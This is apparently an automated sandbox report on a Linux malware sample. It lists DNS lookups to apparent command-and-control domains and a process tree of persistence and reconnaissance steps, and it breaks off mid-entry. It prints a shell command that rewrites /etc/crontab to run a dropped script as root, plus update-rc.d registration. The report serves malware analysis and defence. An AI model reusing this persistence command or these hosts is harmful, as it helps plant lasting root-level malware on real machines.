Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 3, 2025 15:27:53.413618088 CET	192.168.2.23	8.8.8.8	0x56e6	Standard query (0)	aa.hostasa.org	A (IP address)	IN (0x0001)	false
Jan 3, 2025 15:27:53.421514988 CET	192.168.2.23	8.8.4.4	0xa3c7	Standard query (0)	aa.hostasa.org	A (IP address)	IN (0x0001)	false
Jan 3, 2025 15:27:53.421700954 CET	192.168.2.23	8.8.8.8	0xecf6	Standard query (0)	ppp.gggatat456.com	A (IP address)	IN (0x0001)	false
Jan 3, 2025 15:27:53.433408976 CET	192.168.2.23	1.1.1.1	0xd826	Standard query (0)	aa.hostasa.org	A (IP address)	IN (0x0001)	false
Jan 3, 2025 15:27:53.448136091 CET	192.168.2.23	1.1.1.1	0xd826	Standard query (0)	aa.hostasa.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 3, 2025 15:27:53.421425104 CET	8.8.8.8	192.168.2.23	0x56e6	Name error (3)	aa.hostasa.org	none	none	A (IP address)	IN (0x0001)	false
Jan 3, 2025 15:27:53.429017067 CET	8.8.8.8	192.168.2.23	0xecf6	No error (0)	ppp.gggatat456.com		137.175.90.213	A (IP address)	IN (0x0001)	false
Jan 3, 2025 15:27:53.429017067 CET	8.8.8.8	192.168.2.23	0xecf6	No error (0)	ppp.gggatat456.com		107.149.213.17	A (IP address)	IN (0x0001)	false
Jan 3, 2025 15:27:53.429017067 CET	8.8.8.8	192.168.2.23	0xecf6	No error (0)	ppp.gggatat456.com		107.149.213.19	A (IP address)	IN (0x0001)	false
Jan 3, 2025 15:27:53.429017067 CET	8.8.8.8	192.168.2.23	0xecf6	No error (0)	ppp.gggatat456.com		107.149.213.21	A (IP address)	IN (0x0001)	false
Jan 3, 2025 15:27:53.429017067 CET	8.8.8.8	192.168.2.23	0xecf6	No error (0)	ppp.gggatat456.com		137.175.90.211	A (IP address)	IN (0x0001)	false
Jan 3, 2025 15:27:53.429017067 CET	8.8.8.8	192.168.2.23	0xecf6	No error (0)	ppp.gggatat456.com		198.2.208.58	A (IP address)	IN (0x0001)	false
Jan 3, 2025 15:27:53.429017067 CET	8.8.8.8	192.168.2.23	0xecf6	No error (0)	ppp.gggatat456.com		137.175.90.210	A (IP address)	IN (0x0001)	false
Jan 3, 2025 15:27:53.429017067 CET	8.8.8.8	192.168.2.23	0xecf6	No error (0)	ppp.gggatat456.com		198.2.208.61	A (IP address)	IN (0x0001)	false
Jan 3, 2025 15:27:53.429017067 CET	8.8.8.8	192.168.2.23	0xecf6	No error (0)	ppp.gggatat456.com		198.2.208.59	A (IP address)	IN (0x0001)	false
Jan 3, 2025 15:27:53.429017067 CET	8.8.8.8	192.168.2.23	0xecf6	No error (0)	ppp.gggatat456.com		198.2.208.57	A (IP address)	IN (0x0001)	false
Jan 3, 2025 15:27:53.429017067 CET	8.8.8.8	192.168.2.23	0xecf6	No error (0)	ppp.gggatat456.com		137.175.90.212	A (IP address)	IN (0x0001)	false
Jan 3, 2025 15:27:53.429017067 CET	8.8.8.8	192.168.2.23	0xecf6	No error (0)	ppp.gggatat456.com		137.175.90.209	A (IP address)	IN (0x0001)	false
Jan 3, 2025 15:27:53.429017067 CET	8.8.8.8	192.168.2.23	0xecf6	No error (0)	ppp.gggatat456.com		198.2.208.60	A (IP address)	IN (0x0001)	false
Jan 3, 2025 15:27:53.429017067 CET	8.8.8.8	192.168.2.23	0xecf6	No error (0)	ppp.gggatat456.com		107.149.213.20	A (IP address)	IN (0x0001)	false
Jan 3, 2025 15:27:53.429017067 CET	8.8.8.8	192.168.2.23	0xecf6	No error (0)	ppp.gggatat456.com		107.149.213.18	A (IP address)	IN (0x0001)	false
Jan 3, 2025 15:27:53.433044910 CET	8.8.4.4	192.168.2.23	0xa3c7	Name error (3)	aa.hostasa.org	none	none	A (IP address)	IN (0x0001)	false
Jan 3, 2025 15:27:53.448013067 CET	1.1.1.1	192.168.2.23	0xd826	Name error (3)	aa.hostasa.org	none	none	A (IP address)	IN (0x0001)	false
Jan 3, 2025 15:27:53.454808950 CET	1.1.1.1	192.168.2.23	0xd826	Name error (3)	aa.hostasa.org	none	none	A (IP address)	IN (0x0001)	false

System Behavior

Analysis Process: UDMp3dZ7nc.elf PID: 6260, Parent PID: 6186

General

Start time (UTC):	14:27:52
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	/tmp/UDMp3dZ7nc.elf
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6261, Parent PID: 6260

General

Start time (UTC):	14:27:52
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6262, Parent PID: 6261

General

Start time (UTC):	14:27:52
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6263, Parent PID: 6262

General

Start time (UTC):	14:27:52
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6264, Parent PID: 6261

General

Start time (UTC):	14:27:52
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6265, Parent PID: 6264

General

Start time (UTC):	14:27:52
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: update-rc.d PID: 6265, Parent PID: 1860

General

Start time (UTC):	14:27:53
Start date (UTC):	03/01/2025
Path:	/sbin/update-rc.d
Arguments:	update-rc.d UDMp3dZ7nc.elf defaults
File size:	3478464 bytes
MD5 hash:	16a21f464119ea7fad1d3660de963637

Chronological Activities

Analysis Process: update-rc.d PID: 6271, Parent PID: 6265

General

Start time (UTC):	14:27:53
Start date (UTC):	03/01/2025
Path:	/sbin/update-rc.d
Arguments:	-
File size:	3478464 bytes
MD5 hash:	16a21f464119ea7fad1d3660de963637

Chronological Activities

Analysis Process: systemctl PID: 6271, Parent PID: 6265

General

Start time (UTC):	14:27:53
Start date (UTC):	03/01/2025
Path:	/bin/systemctl
Arguments:	systemctl daemon-reload
File size:	996584 bytes
MD5 hash:	4deddfb6741481f68aeac522cc26ff4b

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6266, Parent PID: 6261

General

Start time (UTC):	14:27:52
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: sh PID: 6266, Parent PID: 6261

General

Start time (UTC):	14:27:52
Start date (UTC):	03/01/2025
Path:	/bin/sh
Arguments:	sh -c "sed -i '/\\/etc\\/cron.hourly\\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 6267, Parent PID: 6266

General

Start time (UTC):	14:27:53
Start date (UTC):	03/01/2025
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sed PID: 6267, Parent PID: 6266

General

Start time (UTC):	14:27:53
Start date (UTC):	03/01/2025
Path:	/bin/sed
Arguments:	sed -i /\\/etc\\/cron.hourly\\/gcc.sh/d /etc/crontab
File size:	121288 bytes
MD5 hash:	885062561f66aa1d4af4c54b9e7cc81a

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6293, Parent PID: 6261

General

Start time (UTC):	14:27:58
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6294, Parent PID: 6293

General

Start time (UTC):	14:27:58
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: oigyzaiygp PID: 6294, Parent PID: 6293

General

Start time (UTC):	14:27:58
Start date (UTC):	03/01/2025
Path:	/usr/bin/oigyzaiygp
Arguments:	/usr/bin/oigyzaiygp ifconfig 6261
File size:	548649 bytes
MD5 hash:	62c3a5bb687fbbf7c6618bea4daadf29

Chronological Activities

Analysis Process: oigyzaiygp PID: 6295, Parent PID: 6294

General

Start time (UTC):	14:27:58
Start date (UTC):	03/01/2025
Path:	/usr/bin/oigyzaiygp
Arguments:	-
File size:	548649 bytes
MD5 hash:	62c3a5bb687fbbf7c6618bea4daadf29

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6296, Parent PID: 6261

General

Start time (UTC):	14:27:58
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6297, Parent PID: 6296

General

Start time (UTC):	14:27:58
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: oigyzaiygp PID: 6297, Parent PID: 6296

General

Start time (UTC):	14:27:58
Start date (UTC):	03/01/2025
Path:	/usr/bin/oigyzaiygp
Arguments:	/usr/bin/oigyzaiygp pwd 6261
File size:	548649 bytes
MD5 hash:	62c3a5bb687fbbf7c6618bea4daadf29

Chronological Activities

Analysis Process: oigyzaiygp PID: 6299, Parent PID: 6297

General

Start time (UTC):	14:27:58
Start date (UTC):	03/01/2025
Path:	/usr/bin/oigyzaiygp
Arguments:	-
File size:	548649 bytes
MD5 hash:	62c3a5bb687fbbf7c6618bea4daadf29

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6298, Parent PID: 6261

General

Start time (UTC):	14:27:58
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6300, Parent PID: 6298

General

Start time (UTC):	14:27:58
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: oigyzaiygp PID: 6300, Parent PID: 6298

General

Start time (UTC):	14:27:58
Start date (UTC):	03/01/2025
Path:	/usr/bin/oigyzaiygp
Arguments:	/usr/bin/oigyzaiygp "cat resolv.conf" 6261
File size:	548649 bytes
MD5 hash:	62c3a5bb687fbbf7c6618bea4daadf29

Chronological Activities

Analysis Process: oigyzaiygp PID: 6304, Parent PID: 6300

General

Start time (UTC):	14:27:58
Start date (UTC):	03/01/2025
Path:	/usr/bin/oigyzaiygp
Arguments:	-
File size:	548649 bytes
MD5 hash:	62c3a5bb687fbbf7c6618bea4daadf29

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6301, Parent PID: 6261

General

Start time (UTC):	14:27:58
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6302, Parent PID: 6301

General

Start time (UTC):	14:27:58
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: oigyzaiygp PID: 6302, Parent PID: 6301

General

Start time (UTC):	14:27:58
Start date (UTC):	03/01/2025
Path:	/usr/bin/oigyzaiygp
Arguments:	/usr/bin/oigyzaiygp gnome-terminal 6261
File size:	548649 bytes
MD5 hash:	62c3a5bb687fbbf7c6618bea4daadf29

Chronological Activities

Analysis Process: oigyzaiygp PID: 6306, Parent PID: 6302

General

Start time (UTC):	14:27:58
Start date (UTC):	03/01/2025
Path:	/usr/bin/oigyzaiygp
Arguments:	-
File size:	548649 bytes
MD5 hash:	62c3a5bb687fbbf7c6618bea4daadf29

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6303, Parent PID: 6261

General

Start time (UTC):	14:27:58
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6305, Parent PID: 6303

General

Start time (UTC):	14:27:58
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: oigyzaiygp PID: 6305, Parent PID: 6303

General

Start time (UTC):	14:27:58
Start date (UTC):	03/01/2025
Path:	/usr/bin/oigyzaiygp
Arguments:	/usr/bin/oigyzaiygp "netstat -an" 6261
File size:	548649 bytes
MD5 hash:	62c3a5bb687fbbf7c6618bea4daadf29

Chronological Activities

Analysis Process: oigyzaiygp PID: 6307, Parent PID: 6305

General

Start time (UTC):	14:27:58
Start date (UTC):	03/01/2025
Path:	/usr/bin/oigyzaiygp
Arguments:	-
File size:	548649 bytes
MD5 hash:	62c3a5bb687fbbf7c6618bea4daadf29

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6311, Parent PID: 6261

General

Start time (UTC):	14:28:04
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6312, Parent PID: 6311

General

Start time (UTC):	14:28:04
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: sosfbbrzmx PID: 6312, Parent PID: 6311

General

Start time (UTC):	14:28:04
Start date (UTC):	03/01/2025
Path:	/usr/bin/sosfbbrzmx
Arguments:	/usr/bin/sosfbbrzmx ifconfig 6261
File size:	548649 bytes
MD5 hash:	01fd1f9249b1844a8c8d2d32cedc38b7

Chronological Activities

Analysis Process: sosfbbrzmx PID: 6313, Parent PID: 6312

General

Start time (UTC):	14:28:04
Start date (UTC):	03/01/2025
Path:	/usr/bin/sosfbbrzmx
Arguments:	-
File size:	548649 bytes
MD5 hash:	01fd1f9249b1844a8c8d2d32cedc38b7

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6314, Parent PID: 6261

General

Start time (UTC):	14:28:04
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6315, Parent PID: 6314

General

Start time (UTC):	14:28:04
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: sosfbbrzmx PID: 6315, Parent PID: 6314

General

Start time (UTC):	14:28:04
Start date (UTC):	03/01/2025
Path:	/usr/bin/sosfbbrzmx
Arguments:	/usr/bin/sosfbbrzmx sh 6261
File size:	548649 bytes
MD5 hash:	01fd1f9249b1844a8c8d2d32cedc38b7

Chronological Activities

Analysis Process: sosfbbrzmx PID: 6318, Parent PID: 6315

General

Start time (UTC):	14:28:04
Start date (UTC):	03/01/2025
Path:	/usr/bin/sosfbbrzmx
Arguments:	-
File size:	548649 bytes
MD5 hash:	01fd1f9249b1844a8c8d2d32cedc38b7

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6316, Parent PID: 6261

General

Start time (UTC):	14:28:04
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6317, Parent PID: 6316

General

Start time (UTC):	14:28:04
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: sosfbbrzmx PID: 6317, Parent PID: 6316

General

Start time (UTC):	14:28:04
Start date (UTC):	03/01/2025
Path:	/usr/bin/sosfbbrzmx
Arguments:	/usr/bin/sosfbbrzmx whoami 6261
File size:	548649 bytes
MD5 hash:	01fd1f9249b1844a8c8d2d32cedc38b7

Chronological Activities

Analysis Process: sosfbbrzmx PID: 6321, Parent PID: 6317

General

Start time (UTC):	14:28:04
Start date (UTC):	03/01/2025
Path:	/usr/bin/sosfbbrzmx
Arguments:	-
File size:	548649 bytes
MD5 hash:	01fd1f9249b1844a8c8d2d32cedc38b7

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6319, Parent PID: 6261

General

Start time (UTC):	14:28:04
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6320, Parent PID: 6319

General

Start time (UTC):	14:28:04
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: sosfbbrzmx PID: 6320, Parent PID: 6319

General

Start time (UTC):	14:28:04
Start date (UTC):	03/01/2025
Path:	/usr/bin/sosfbbrzmx
Arguments:	/usr/bin/sosfbbrzmx ls 6261
File size:	548649 bytes
MD5 hash:	01fd1f9249b1844a8c8d2d32cedc38b7

Chronological Activities

Analysis Process: sosfbbrzmx PID: 6324, Parent PID: 6320

General

Start time (UTC):	14:28:04
Start date (UTC):	03/01/2025
Path:	/usr/bin/sosfbbrzmx
Arguments:	-
File size:	548649 bytes
MD5 hash:	01fd1f9249b1844a8c8d2d32cedc38b7

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6322, Parent PID: 6261

General

Start time (UTC):	14:28:04
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6323, Parent PID: 6322

General

Start time (UTC):	14:28:04
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: sosfbbrzmx PID: 6323, Parent PID: 6322

General

Start time (UTC):	14:28:04
Start date (UTC):	03/01/2025
Path:	/usr/bin/sosfbbrzmx
Arguments:	/usr/bin/sosfbbrzmx top 6261
File size:	548649 bytes
MD5 hash:	01fd1f9249b1844a8c8d2d32cedc38b7

Chronological Activities

Analysis Process: sosfbbrzmx PID: 6325, Parent PID: 6323

General

Start time (UTC):	14:28:04
Start date (UTC):	03/01/2025
Path:	/usr/bin/sosfbbrzmx
Arguments:	-
File size:	548649 bytes
MD5 hash:	01fd1f9249b1844a8c8d2d32cedc38b7

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6328, Parent PID: 6261

General

Start time (UTC):	14:28:09
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6329, Parent PID: 6328

General

Start time (UTC):	14:28:09
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: gphlkawhxw PID: 6329, Parent PID: 6328

General

Start time (UTC):	14:28:09
Start date (UTC):	03/01/2025
Path:	/usr/bin/gphlkawhxw
Arguments:	/usr/bin/gphlkawhxw "ifconfig eth0" 6261
File size:	548649 bytes
MD5 hash:	32baef41bef86e657cecb26ba601c8fd

Chronological Activities

Analysis Process: gphlkawhxw PID: 6330, Parent PID: 6329

General

Start time (UTC):	14:28:09
Start date (UTC):	03/01/2025
Path:	/usr/bin/gphlkawhxw
Arguments:	-
File size:	548649 bytes
MD5 hash:	32baef41bef86e657cecb26ba601c8fd

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6331, Parent PID: 6261

General

Start time (UTC):	14:28:09
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6332, Parent PID: 6331

General

Start time (UTC):	14:28:09
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: gphlkawhxw PID: 6332, Parent PID: 6331

General

Start time (UTC):	14:28:09
Start date (UTC):	03/01/2025
Path:	/usr/bin/gphlkawhxw
Arguments:	/usr/bin/gphlkawhxw uptime 6261
File size:	548649 bytes
MD5 hash:	32baef41bef86e657cecb26ba601c8fd

Chronological Activities

Analysis Process: gphlkawhxw PID: 6337, Parent PID: 6332

General

Start time (UTC):	14:28:10
Start date (UTC):	03/01/2025
Path:	/usr/bin/gphlkawhxw
Arguments:	-
File size:	548649 bytes
MD5 hash:	32baef41bef86e657cecb26ba601c8fd

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6333, Parent PID: 6261

General

Start time (UTC):	14:28:09
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6334, Parent PID: 6333

General

Start time (UTC):	14:28:09
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: gphlkawhxw PID: 6334, Parent PID: 6333

General

Start time (UTC):	14:28:09
Start date (UTC):	03/01/2025
Path:	/usr/bin/gphlkawhxw
Arguments:	/usr/bin/gphlkawhxw "route -n" 6261
File size:	548649 bytes
MD5 hash:	32baef41bef86e657cecb26ba601c8fd

Chronological Activities

Analysis Process: gphlkawhxw PID: 6340, Parent PID: 6334

General

Start time (UTC):	14:28:10
Start date (UTC):	03/01/2025
Path:	/usr/bin/gphlkawhxw
Arguments:	-
File size:	548649 bytes
MD5 hash:	32baef41bef86e657cecb26ba601c8fd

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6335, Parent PID: 6261

General

Start time (UTC):	14:28:09
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6336, Parent PID: 6335

General

Start time (UTC):	14:28:09
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: gphlkawhxw PID: 6336, Parent PID: 6335

General

Start time (UTC):	14:28:09
Start date (UTC):	03/01/2025
Path:	/usr/bin/gphlkawhxw
Arguments:	/usr/bin/gphlkawhxw ls 6261
File size:	548649 bytes
MD5 hash:	32baef41bef86e657cecb26ba601c8fd

Chronological Activities

Analysis Process: gphlkawhxw PID: 6341, Parent PID: 6336

General

Start time (UTC):	14:28:10
Start date (UTC):	03/01/2025
Path:	/usr/bin/gphlkawhxw
Arguments:	-
File size:	548649 bytes
MD5 hash:	32baef41bef86e657cecb26ba601c8fd

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6338, Parent PID: 6261

General

Start time (UTC):	14:28:10
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6339, Parent PID: 6338

General

Start time (UTC):	14:28:10
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: gphlkawhxw PID: 6339, Parent PID: 6338

General

Start time (UTC):	14:28:10
Start date (UTC):	03/01/2025
Path:	/usr/bin/gphlkawhxw
Arguments:	/usr/bin/gphlkawhxw who 6261
File size:	548649 bytes
MD5 hash:	32baef41bef86e657cecb26ba601c8fd

Chronological Activities

Analysis Process: gphlkawhxw PID: 6342, Parent PID: 6339

General

Start time (UTC):	14:28:10
Start date (UTC):	03/01/2025
Path:	/usr/bin/gphlkawhxw
Arguments:	-
File size:	548649 bytes
MD5 hash:	32baef41bef86e657cecb26ba601c8fd

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6364, Parent PID: 6261

General

Start time (UTC):	14:28:15
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6365, Parent PID: 6364

General

Start time (UTC):	14:28:15
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: vnihfmehfy PID: 6365, Parent PID: 6364

General

Start time (UTC):	14:28:15
Start date (UTC):	03/01/2025
Path:	/usr/bin/vnihfmehfy
Arguments:	/usr/bin/vnihfmehfy "cat resolv.conf" 6261
File size:	548649 bytes
MD5 hash:	f0f21df0836e951d36bb440812753052

Chronological Activities

Analysis Process: vnihfmehfy PID: 6366, Parent PID: 6365

General

Start time (UTC):	14:28:15
Start date (UTC):	03/01/2025
Path:	/usr/bin/vnihfmehfy
Arguments:	-
File size:	548649 bytes
MD5 hash:	f0f21df0836e951d36bb440812753052

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6367, Parent PID: 6261

General

Start time (UTC):	14:28:15
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6368, Parent PID: 6367

General

Start time (UTC):	14:28:15
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: vnihfmehfy PID: 6368, Parent PID: 6367

General

Start time (UTC):	14:28:15
Start date (UTC):	03/01/2025
Path:	/usr/bin/vnihfmehfy
Arguments:	/usr/bin/vnihfmehfy id 6261
File size:	548649 bytes
MD5 hash:	f0f21df0836e951d36bb440812753052

Chronological Activities

Analysis Process: vnihfmehfy PID: 6371, Parent PID: 6368

General

Start time (UTC):	14:28:15
Start date (UTC):	03/01/2025
Path:	/usr/bin/vnihfmehfy
Arguments:	-
File size:	548649 bytes
MD5 hash:	f0f21df0836e951d36bb440812753052

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6369, Parent PID: 6261

General

Start time (UTC):	14:28:15
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6370, Parent PID: 6369

General

Start time (UTC):	14:28:15
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: vnihfmehfy PID: 6370, Parent PID: 6369

General

Start time (UTC):	14:28:15
Start date (UTC):	03/01/2025
